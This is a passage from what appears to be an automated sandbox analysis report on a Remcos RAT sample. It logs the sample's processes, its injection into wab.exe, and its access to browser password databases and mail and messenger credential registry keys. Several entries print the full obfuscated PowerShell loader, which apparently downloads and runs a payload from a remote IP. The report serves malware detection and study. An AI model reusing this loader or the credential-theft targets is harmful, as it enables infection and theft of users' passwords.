neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)SnaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rezgswvvdaxhfwhbljiggfuyfzlyb"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\byfqtofpripmidvfcuvirkhhgovgcyok"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tdzlsryxddwcregfnedpxpcyjtslpk"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic';if (${host}.currentculture) {$sinologi++;}function gunflints($handsawfish){$guvnor=$handsawfish.length-$sinologi;$beflounce96='substri';$beflounce96+='ng';for( $fletteprocessers=7;$fletteprocessers -lt $guvnor;$fletteprocessers+=8){$racings+=$handsawfish.$beflounce96.invoke( $fletteprocessers, $sinologi);}$racings;}function skildrerne($larrigan){ &($cumulates) ($larrigan);}$cryptoglaux=gunflints 'slvpapim rullego aulostzc,quinaic acatel teitmilforzanda voldsh/unwilt 5ost.nsi.prmiere0glazier gennems( emascuw sluppeipylorosnpolyli d s,ifteoanalysewconvolvs intens damerkknfngsel.tbedaa e ptisanr1 tarrag0 typif,.dinguse0.ambesg;laurent aimilepwsudansaibestillnadrenin6.eander4latesce;agerdyr a toplaxdiso de6audi,iv4 precon; beregn tvrrebsrtromlervl ftreg: zilasm1csarre.2 opsaml1rringer.riv nca0franker)tilfres systempgudskregebawbeescaddendek igua,oosemenan/ econo.2libe ta0 shaved1harvard0bitmnst0standar1 trerum0presump1subinte by,selvf s,igeriunrooflrm.nostie disoccf bservaofug,ighxtriglyp/halvoff1kultu,m2aut,mob1klinikk.haa dva0triadic ';$spliff=gunflints 'bela neup,oletasktast.serejekllrudskyde-genopleadyffeleg oversteafskninnearfulstombreaf ';$parolees=gunflints 'udpegelhblgeb vt beregnt syphonpurfjeld:nicadss/alufo,i/svingsa1glycero0 str.tc3dep,tat.vavasor2d.alate3te,rsta7annegit.torkild8doekspr6svovlha.fro.tlu2strutma4tegneku7emb,yol/applikaucorticid rejsegmgemotsma di,selg orskefrin.ighteresurget ove,tr.isbaadshhashpibholie orkl kishn ';$furibund=gunflints 'enkelth>se.opus ';$cumulates=gunflints ' snitfliforladeemarlinexoverp i ';$vandrerkorts='paatalernes';$onklerne = gunflints 'undu eoefeelingc skyldnh,dlydskowastefu deflor%u.profiaover,oppovertrdp d onnidrigstrna graasttbnketsia rkanst%garant.\frescoefparaff eungeniaj ove bad cardioeingen.odha,lsstegule.dd.prstegaeplafo,dlshowboalallinge meazlef&bundtet&phi,ant ynglerne manslacliglotth.heologoraynard krampetp.ragra ';skildrerne (gunflints ' fredni$,ccumbmg akropolmich.elo skaanebspisekraudsivnildi,xinr: hyssenkfiskeriup.einstnunburntd dis ere.ntermatstamin.jfo tbrieaa.sindnlooeysuemonterisover,eatrykindeecetoniin bri.ebsc,shmer=underbe(electroc runcatmvi.terhdselvkla rangkla/inco.vecxylosma thainto$korrig osphac ln cum.lak.esparilunderchedvlerehrkontraknpa,ralle.dmeasu)sna
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic';if (${host}.currentculture) {$sinologi++;}function gunflints($handsawfish){$guvnor=$handsawfish.length-$sinologi;$beflounce96='substri';$beflounce96+='ng';for( $fletteprocessers=7;$fletteprocessers -lt $guvnor;$fletteprocessers+=8){$racings+=$handsawfish.$beflounce96.invoke( $fletteprocessers, $sinologi);}$racings;}function skildrerne($larrigan){ &($cumulates) ($larrigan);}$cryptoglaux=gunflints 'slvpapim rullego aulostzc,quinaic acatel teitmilforzanda voldsh/unwilt 5ost.nsi.prmiere0glazier gennems( emascuw sluppeipylorosnpolyli d s,ifteoanalysewconvolvs intens damerkknfngsel.tbedaa e ptisanr1 tarrag0 typif,.dinguse0.ambesg;laurent aimilepwsudansaibestillnadrenin6.eander4latesce;agerdyr a toplaxdiso de6audi,iv4 precon; beregn tvrrebsrtromlervl ftreg: zilasm1csarre.2 opsaml1rringer.riv nca0franker)tilfres systempgudskregebawbeescaddendek igua,oosemenan/ econo.2libe ta0 shaved1harvard0bitmnst0standar1 trerum0presump1subinte by,selvf s,igeriunrooflrm.nostie disoccf bservaofug,ighxtriglyp/halvoff1kultu,m2aut,mob1klinikk.haa dva0triadic ';$spliff=gunflints 'bela neup,oletasktast.serejekllrudskyde-genopleadyffeleg oversteafskninnearfulstombreaf ';$parolees=gunflints 'udpegelhblgeb vt beregnt syphonpurfjeld:nicadss/alufo,i/svingsa1glycero0 str.tc3dep,tat.vavasor2d.alate3te,rsta7annegit.torkild8doekspr6svovlha.fro.tlu2strutma4tegneku7emb,yol/applikaucorticid rejsegmgemotsma di,selg orskefrin.ighteresurget ove,tr.isbaadshhashpibholie orkl kishn ';$furibund=gunflints 'enkelth>se.opus ';$cumulates=gunflints ' snitfliforladeemarlinexoverp i ';$vandrerkorts='paatalernes';$onklerne = gunflints 'undu eoefeelingc skyldnh,dlydskowastefu deflor%u.profiaover,oppovertrdp d onnidrigstrna graasttbnketsia rkanst%garant.\frescoefparaff eungeniaj ove bad cardioeingen.odha,lsstegule.dd.prstegaeplafo,dlshowboalallinge meazlef&bundtet&phi,ant ynglerne manslacliglotth.heologoraynard krampetp.ragra ';skildrerne (gunflints ' fredni$,ccumbmg akropolmich.elo skaanebspisekraudsivnildi,xinr: hyssenkfiskeriup.einstnunburntd dis ere.ntermatstamin.jfo tbrieaa.sindnlooeysuemonterisover,eatrykindeecetoniin bri.ebsc,shmer=underbe(electroc runcatmvi.terhdselvkla rangkla/inco.vecxylosma thainto$korrig osphac ln cum.lak.esparilunderchedvlerehrkontraknpa,ralle.dmeasu)sna
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic';if (${host}.currentculture) {$sinologi++;}function gunflints($handsawfish){$guvnor=$handsawfish.length-$sinologi;$beflounce96='substri';$beflounce96+='ng';for( $fletteprocessers=7;$fletteprocessers -lt $guvnor;$fletteprocessers+=8){$racings+=$handsawfish.$beflounce96.invoke( $fletteprocessers, $sinologi);}$racings;}function skildrerne($larrigan){ &($cumulates) ($larrigan);}$cryptoglaux=gunflints 'slvpapim rullego aulostzc,quinaic acatel teitmilforzanda voldsh/unwilt 5ost.nsi.prmiere0glazier gennems( emascuw sluppeipylorosnpolyli d s,ifteoanalysewconvolvs intens damerkknfngsel.tbedaa e ptisanr1 tarrag0 typif,.dinguse0.ambesg;laurent aimilepwsudansaibestillnadrenin6.eander4latesce;agerdyr a toplaxdiso de6audi,iv4 precon; beregn tvrrebsrtromlervl ftreg: zilasm1csarre.2 opsaml1rringer.riv nca0franker)tilfres systempgudskregebawbeescaddendek igua,oosemenan/ econo.2libe ta0 shaved1harvard0bitmnst0standar1 trerum0presump1subinte by,selvf s,igeriunrooflrm.nostie disoccf bservaofug,ighxtriglyp/halvoff1kultu,m2aut,mob1klinikk.haa dva0triadic ';$spliff=gunflints 'bela neup,oletasktast.serejekllrudskyde-genopleadyffeleg oversteafskninnearfulstombreaf ';$parolees=gunflints 'udpegelhblgeb vt beregnt syphonpurfjeld:nicadss/alufo,i/svingsa1glycero0 str.tc3dep,tat.vavasor2d.alate3te,rsta7annegit.torkild8doekspr6svovlha.fro.tlu2strutma4tegneku7emb,yol/applikaucorticid rejsegmgemotsma di,selg orskefrin.ighteresurget ove,tr.isbaadshhashpibholie orkl kishn ';$furibund=gunflints 'enkelth>se.opus ';$cumulates=gunflints ' snitfliforladeemarlinexoverp i ';$vandrerkorts='paatalernes';$onklerne = gunflints 'undu eoefeelingc skyldnh,dlydskowastefu deflor%u.profiaover,oppovertrdp d onnidrigstrna graasttbnketsia rkanst%garant.\frescoefparaff eungeniaj ove bad cardioeingen.odha,lsstegule.dd.prstegaeplafo,dlshowboalallinge meazlef&bundtet&phi,ant ynglerne manslacliglotth.heologoraynard krampetp.ragra ';skildrerne (gunflints ' fredni$,ccumbmg akropolmich.elo skaanebspisekraudsivnildi,xinr: hyssenkfiskeriup.einstnunburntd dis ere.ntermatstamin.jfo tbrieaa.sindnlooeysuemonterisover,eatrykindeecetoniin bri.ebsc,shmer=underbe(electroc runcatmvi.terhdselvkla rangkla/inco.vecxylosma thainto$korrig osphac ln cum.lak.esparilunderchedvlerehrkontraknpa,ralle.dmeasu)snaJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic';if (${host}.currentculture) {$sinologi++;}function gunflints($handsawfish){$guvnor=$handsawfish.length-$sinologi;$beflounce96='substri';$beflounce96+='ng';for( $fletteprocessers=7;$fletteprocessers -lt $guvnor;$fletteprocessers+=8){$racings+=$handsawfish.$beflounce96.invoke( $fletteprocessers, $sinologi);}$racings;}function skildrerne($larrigan){ &($cumulates) ($larrigan);}$cryptoglaux=gunflints 'slvpapim rullego aulostzc,quinaic acatel teitmilforzanda voldsh/unwilt 5ost.nsi.prmiere0glazier gennems( emascuw sluppeipylorosnpolyli d s,ifteoanalysewconvolvs intens damerkknfngsel.tbedaa e ptisanr1 tarrag0 typif,.dinguse0.ambesg;laurent aimilepwsudansaibestillnadrenin6.eander4latesce;agerdyr a toplaxdiso de6audi,iv4 precon; beregn tvrrebsrtromlervl ftreg: zilasm1csarre.2 opsaml1rringer.riv nca0franker)tilfres systempgudskregebawbeescaddendek igua,oosemenan/ econo.2libe ta0 shaved1harvard0bitmnst0standar1 trerum0presump1subinte by,selvf s,igeriunrooflrm.nostie disoccf bservaofug,ighxtriglyp/halvoff1kultu,m2aut,mob1klinikk.haa dva0triadic ';$spliff=gunflints 'bela neup,oletasktast.serejekllrudskyde-genopleadyffeleg oversteafskninnearfulstombreaf ';$parolees=gunflints 'udpegelhblgeb vt beregnt syphonpurfjeld:nicadss/alufo,i/svingsa1glycero0 str.tc3dep,tat.vavasor2d.alate3te,rsta7annegit.torkild8doekspr6svovlha.fro.tlu2strutma4tegneku7emb,yol/applikaucorticid rejsegmgemotsma di,selg orskefrin.ighteresurget ove,tr.isbaadshhashpibholie orkl kishn ';$furibund=gunflints 'enkelth>se.opus ';$cumulates=gunflints ' snitfliforladeemarlinexoverp i ';$vandrerkorts='paatalernes';$onklerne = gunflints 'undu eoefeelingc skyldnh,dlydskowastefu deflor%u.profiaover,oppovertrdp d onnidrigstrna graasttbnketsia rkanst%garant.\frescoefparaff eungeniaj ove bad cardioeingen.odha,lsstegule.dd.prstegaeplafo,dlshowboalallinge meazlef&bundtet&phi,ant ynglerne manslacliglotth.heologoraynard krampetp.ragra ';skildrerne (gunflints ' fredni$,ccumbmg akropolmich.elo skaanebspisekraudsivnildi,xinr: hyssenkfiskeriup.einstnunburntd dis ere.ntermatstamin.jfo tbrieaa.sindnlooeysuemonterisover,eatrykindeecetoniin bri.ebsc,shmer=underbe(electroc runcatmvi.terhdselvkla rangkla/inco.vecxylosma thainto$korrig osphac ln cum.lak.esparilunderchedvlerehrkontraknpa,ralle.dmeasu)snaJump to behavior
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHK\
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager&5H
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHK\O5
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHK\79a5
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHK\23
                Source: wab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.drBinary or memory string: [Program Manager]
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22792933 cpuid 9_2_22792933
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22792264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_22792264
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,11_2_004082CD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0041739B GetVersionExW,10_2_0041739B
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7772, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Instant Messenger accounts or passwords
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
